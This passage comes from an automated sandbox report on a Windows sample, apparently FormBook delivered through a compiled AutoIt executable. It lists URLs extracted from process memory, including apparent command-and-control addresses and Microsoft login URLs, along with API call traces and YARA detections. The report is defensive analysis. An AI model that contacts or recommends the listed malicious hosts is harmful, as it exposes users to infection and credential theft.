                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mynewshub.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naikuaizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nuoyunzhibo.com
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oshwal.net
                Source: OtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.overlayoasis.quest
                Source: OtAlYRopPg.exe, 00000007.00000002.4625453218.00000000052AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.overlayoasis.quest/ufm5/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pasiones.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.perfectpint.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qilinzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qimiaozhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qinglizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qiyuezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.rsbi.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.s8zhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.startuptalent.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.stayplus.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tangyizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.welovebeauty.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wujizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wunvzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaodouzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaomiaozhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiapizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyuanzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xunaizhibo.com/binding
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaomeizhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yemizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinxiuzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.younazhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourreality.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuehaizhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueyanzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zhonglangzhibo.net
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003386000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: chkntfs.exe, 00000006.00000003.2758698747.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: chkntfs.exe, 00000006.00000002.4617121660.0000000002692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C3912D GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00C3912D
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00CB9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CB9576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: 1162-201.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1162-201.exe, 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_32a51be0-2
                Source: 1162-201.exe, 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_29504cec-f
                Source: 1162-201.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_54b654d6-5
                Source: 1162-201.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ff353706-1
